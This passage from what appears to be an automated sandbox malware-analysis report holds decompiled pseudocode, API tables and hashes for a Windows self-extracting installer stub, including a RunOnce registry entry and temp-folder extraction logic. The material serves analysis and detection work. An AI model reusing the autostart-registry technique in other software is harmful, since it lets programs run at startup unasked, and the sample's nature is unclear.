							 *0x2a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x29124 = 0;
				if(E00022CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00022F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E000252B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x28a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x29a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00021F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x28588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x29124; // 0x80070002
				return _t7;
			}


















                                                                                                                                                                                                                                                0x00022c03
                                                                                                                                                                                                                                                0x00022c0d
                                                                                                                                                                                                                                                0x00022c18
                                                                                                                                                                                                                                                0x00022c20
                                                                                                                                                                                                                                                0x00022c2e
                                                                                                                                                                                                                                                0x00022c32
                                                                                                                                                                                                                                                0x00022c36
                                                                                                                                                                                                                                                0x00022c3d
                                                                                                                                                                                                                                                0x00022c43
                                                                                                                                                                                                                                                0x00022c45
                                                                                                                                                                                                                                                0x00022c47
                                                                                                                                                                                                                                                0x00022c49
                                                                                                                                                                                                                                                0x00022c4e
                                                                                                                                                                                                                                                0x00022c4e
                                                                                                                                                                                                                                                0x00022c47
                                                                                                                                                                                                                                                0x00022c32
                                                                                                                                                                                                                                                0x00022c20
                                                                                                                                                                                                                                                0x00022c50
                                                                                                                                                                                                                                                0x00022c54
                                                                                                                                                                                                                                                0x00022c57
                                                                                                                                                                                                                                                0x00022c64
                                                                                                                                                                                                                                                0x00022c66
                                                                                                                                                                                                                                                0x00022c6b
                                                                                                                                                                                                                                                0x00022c6d
                                                                                                                                                                                                                                                0x00022c74
                                                                                                                                                                                                                                                0x00022c76
                                                                                                                                                                                                                                                0x00022c7c
                                                                                                                                                                                                                                                0x00022c7e
                                                                                                                                                                                                                                                0x00022c87
                                                                                                                                                                                                                                                0x00022c89
                                                                                                                                                                                                                                                0x00022c89
                                                                                                                                                                                                                                                0x00022c87
                                                                                                                                                                                                                                                0x00022c7c
                                                                                                                                                                                                                                                0x00022c74
                                                                                                                                                                                                                                                0x00022c8e
                                                                                                                                                                                                                                                0x00022c95
                                                                                                                                                                                                                                                0x00022c98
                                                                                                                                                                                                                                                0x00022c98
                                                                                                                                                                                                                                                0x00022c9e
                                                                                                                                                                                                                                                0x00022ca7

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000002,00000000,?,00026BB0,00020000,00000000,00000002,0000000A), ref: 00022C03
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00026BB0,00020000,00000000,00000002,0000000A), ref: 00022C18
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00022C28
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00026BB0,00020000,00000000,00000002,0000000A), ref: 00022C98
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                • Opcode ID: e8f052127ec0f5e4261a2d46de0c6df596142a2bf91907db35eb187e02cd9e88
                                                                                                                                                                                                                                                • Instruction ID: 8d5815df5d77c0707c23acfe1238cc6d9330f2f612720e35f948861fd880c7f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8f052127ec0f5e4261a2d46de0c6df596142a2bf91907db35eb187e02cd9e88
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85112571700335BBE7306BF5BC89BAF37999B843A0B340025F904E3251CE38EC528666
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00026F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00026F40() {

				SetUnhandledExceptionFilter(E00026EF0); // executed
				return 0;
			}



                                                                                                                                                                                                                                                0x00026f45
                                                                                                                                                                                                                                                0x00026f4d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00026F45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                • Opcode ID: 9ea91040b39283413db0ab3a526032256bc809445d9f4fb46426d8b0cdf68f1b
                                                                                                                                                                                                                                                • Instruction ID: 2483ec8f846ae132cb26364bc6b7de9b375e2a237acd23f84cf25ea9c16804b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ea91040b39283413db0ab3a526032256bc809445d9f4fb46426d8b0cdf68f1b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE90027435115047BA201B70AD19415B5915B5E612B925460A111C8894DF6540515512
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0002202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0002202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x28004; // 0xf4950d3e
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00026CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0002171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0002658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x29a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x291e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x291e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x291e5);
						if(_t90 != 0) {
							 *0x28580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
							E0002171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E000244B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0002658A( &_v268, 0x104, 0x21140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x28530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                                                                0x0002202a
                                                                                                                                                                                                                                                0x00022035
                                                                                                                                                                                                                                                0x0002203c
                                                                                                                                                                                                                                                0x00022041
                                                                                                                                                                                                                                                0x00022050
                                                                                                                                                                                                                                                0x0002205f
                                                                                                                                                                                                                                                0x00022064
                                                                                                                                                                                                                                                0x0002206f
                                                                                                                                                                                                                                                0x0002208c
                                                                                                                                                                                                                                                0x00022094
                                                                                                                                                                                                                                                0x00022257
                                                                                                                                                                                                                                                0x00022266
                                                                                                                                                                                                                                                0x00022266
                                                                                                                                                                                                                                                0x0002209a
                                                                                                                                                                                                                                                0x0002209b
                                                                                                                                                                                                                                                0x0002209d
                                                                                                                                                                                                                                                0x000220aa
                                                                                                                                                                                                                                                0x000220af
                                                                                                                                                                                                                                                0x000220c9
                                                                                                                                                                                                                                                0x000220d1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000220d3
                                                                                                                                                                                                                                                0x000220da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000220da
                                                                                                                                                                                                                                                0x000220e2
                                                                                                                                                                                                                                                0x00022103
                                                                                                                                                                                                                                                0x0002210e
                                                                                                                                                                                                                                                0x00022116
                                                                                                                                                                                                                                                0x00022122
                                                                                                                                                                                                                                                0x00022128
                                                                                                                                                                                                                                                0x0002212c
                                                                                                                                                                                                                                                0x00022179
                                                                                                                                                                                                                                                0x00022194
                                                                                                                                                                                                                                                0x000221de
                                                                                                                                                                                                                                                0x000221e4
                                                                                                                                                                                                                                                0x00022256
                                                                                                                                                                                                                                                0x00022256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022256
                                                                                                                                                                                                                                                0x00022196
                                                                                                                                                                                                                                                0x00022196
                                                                                                                                                                                                                                                0x0002219c
                                                                                                                                                                                                                                                0x0002219f
                                                                                                                                                                                                                                                0x0002219f
                                                                                                                                                                                                                                                0x000221a1
                                                                                                                                                                                                                                                0x000221a2
                                                                                                                                                                                                                                                0x000221a6
                                                                                                                                                                                                                                                0x000221a8
                                                                                                                                                                                                                                                0x000221b0
                                                                                                                                                                                                                                                0x000221b0
                                                                                                                                                                                                                                                0x000221b2
                                                                                                                                                                                                                                                0x000221b3
                                                                                                                                                                                                                                                0x000221bc
                                                                                                                                                                                                                                                0x000221c7
                                                                                                                                                                                                                                                0x000221cb
                                                                                                                                                                                                                                                0x000221f1
                                                                                                                                                                                                                                                0x000221f6
                                                                                                                                                                                                                                                0x000221fd
                                                                                                                                                                                                                                                0x000221ff
                                                                                                                                                                                                                                                0x000221ff
                                                                                                                                                                                                                                                0x00022204
                                                                                                                                                                                                                                                0x00022213
                                                                                                                                                                                                                                                0x00022218
                                                                                                                                                                                                                                                0x0002221d
                                                                                                                                                                                                                                                0x0002221d
                                                                                                                                                                                                                                                0x00022220
                                                                                                                                                                                                                                                0x00022220
                                                                                                                                                                                                                                                0x00022222
                                                                                                                                                                                                                                                0x00022223
                                                                                                                                                                                                                                                0x00022229
                                                                                                                                                                                                                                                0x0002223d
                                                                                                                                                                                                                                                0x00022249
                                                                                                                                                                                                                                                0x00022250
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022250
                                                                                                                                                                                                                                                0x000221d2
                                                                                                                                                                                                                                                0x000221d9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000221d9
                                                                                                                                                                                                                                                0x0002213a
                                                                                                                                                                                                                                                0x00022141
                                                                                                                                                                                                                                                0x00022144
                                                                                                                                                                                                                                                0x0002214c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022163
                                                                                                                                                                                                                                                0x00022172
                                                                                                                                                                                                                                                0x00022172
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022163
                                                                                                                                                                                                                                                0x000220ea
                                                                                                                                                                                                                                                0x000220f0
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00022050
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0002205F
                                                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0002208C
                                                                                                                                                                                                                                                  • Part of subcall function 0002171E: _vsnprintf.MSVCRT ref: 00021750
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000220C9
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000220EA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00022103
                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00022122
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00022134
                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00022144
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0002215B
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0002218C
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000221C1
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000221E4
                                                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0002223D
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00022249
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00022250
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                                                                • API String ID: 178549006-850274211
                                                                                                                                                                                                                                                • Opcode ID: 9d5aeaa301208e27a1d16269df4a2aec134bcd574e2d00f1d410f6105f7289bb
                                                                                                                                                                                                                                                • Instruction ID: 8d13b5f379b131b86073e242dfd8e6c3cff6c467255b74c766ef8d3acc3ae235
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d5aeaa301208e27a1d16269df4a2aec134bcd574e2d00f1d410f6105f7289bb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3951D475A00234BBEB309B60EC89FEA777CEF55700F1041A4FA49E7151DE759E8A8B60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000255A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 232 255a0-255d9 call 2468f LocalAlloc 235 255db-255f1 call 244b9 call 26285 232->235 236 255fd-2560c call 2468f 232->236 248 255f6-255f8 235->248 242 25632-25643 lstrcmpA 236->242 243 2560e-25630 call 244b9 LocalFree 236->243 246 25645 242->246 247 2564b-25659 LocalFree 242->247 243->248 246->247 250 25696-2569c 247->250 251 2565b-2565d 247->251 252 258b7-258c7 call 26ce0 248->252 253 256a2-256a8 250->253 254 2589f-258b5 call 26517 250->254 255 25669 251->255 256 2565f-25667 251->256 253->254 260 256ae-256c1 GetTempPathA 253->260 254->252 257 2566b-2567a call 25467 255->257 256->255 256->257 269 25680-25691 call 244b9 257->269 270 2589b-2589d 257->270 264 256f3-25711 call 21781 260->264 265 256c3-256c9 call 25467 260->265 274 25717-25729 GetDriveTypeA 264->274 275 2586c-25890 GetWindowsDirectoryA call 2597d 264->275 272 256ce-256d0 265->272 269->248 270->252 272->270 276 256d6-256df call 22630 272->276 278 25730-25740 GetFileAttributesA 274->278 279 2572b-2572e 274->279 275->264 289 25896 275->289 276->264 290 256e1-256ed call 25467 276->290 282 25742-25745 278->282 283 2577e-2578f call 2597d 278->283 279->278 279->282 287 25747-2574f 282->287 288 2576b 282->288 297 257b2-257bf call 22630 283->297 298 25791-2579e call 22630 283->298 291 25771-25779 287->291 294 25751-25753 287->294 288->291 289->270 290->264 290->270 295 25864-25866 291->295 294->291 299 25755-25762 call 26952 294->299 295->274 295->275 307 257d3-257f8 call 2658a GetFileAttributesA 297->307 308 257c1-257cd GetWindowsDirectoryA 297->308 298->288 306 257a0-257b0 call 2597d 298->306 299->288 309 25764-25769 299->309 306->288 306->297 314 2580a 307->314 315 257fa-25808 CreateDirectoryA 307->315 308->307 309->283 309->288 316 2580d-2580f 314->316 315->316 317 25811-25825 316->317 318 25827-2585c SetFileAttributesA call 21781 call 25467 316->318 317->295 318->270 323 2585e 318->323 323->295
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E000255A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x28004; // 0xf4950d3e
				_v8 = _t28 ^ _t110;
				_t2 = E0002468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0002468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x29a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x28b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x28a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00026517(_t82, 0x7d2, 0, E00023210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x29a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x291e4;
									_t40 = GetTempPathA(0x104, 0x291e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00021781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00026952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0002597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00022630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0002658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x291e4;
																					E00021781(0x291e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00025467(0x291e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00022630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0002597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00025467(0x291e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x291e4;
											_t70 = E00022630(0, 0x291e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x291e4;
												_t71 = E00025467(0x291e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0002597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x28b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00025467(0x28b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E000244B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E000244B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x29124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E000244B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x29124 = E00026285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00026CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                                                                0x000255ab
                                                                                                                                                                                                                                                0x000255b2
                                                                                                                                                                                                                                                0x000255c9
                                                                                                                                                                                                                                                0x000255d5
                                                                                                                                                                                                                                                0x000255d9
                                                                                                                                                                                                                                                0x00025600
                                                                                                                                                                                                                                                0x00025605
                                                                                                                                                                                                                                                0x0002560a
                                                                                                                                                                                                                                                0x0002560c
                                                                                                                                                                                                                                                0x00025638
                                                                                                                                                                                                                                                0x00025641
                                                                                                                                                                                                                                                0x00025643
                                                                                                                                                                                                                                                0x00025645
                                                                                                                                                                                                                                                0x00025645
                                                                                                                                                                                                                                                0x0002564c
                                                                                                                                                                                                                                                0x00025652
                                                                                                                                                                                                                                                0x00025657
                                                                                                                                                                                                                                                0x00025659
                                                                                                                                                                                                                                                0x00025696
                                                                                                                                                                                                                                                0x0002569c
                                                                                                                                                                                                                                                0x0002589f
                                                                                                                                                                                                                                                0x000258a7
                                                                                                                                                                                                                                                0x000258ac
                                                                                                                                                                                                                                                0x000258b3
                                                                                                                                                                                                                                                0x000258b5
                                                                                                                                                                                                                                                0x000256a2
                                                                                                                                                                                                                                                0x000256a2
                                                                                                                                                                                                                                                0x000256a8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000256ae
                                                                                                                                                                                                                                                0x000256ae
                                                                                                                                                                                                                                                0x000256b9
                                                                                                                                                                                                                                                0x000256bf
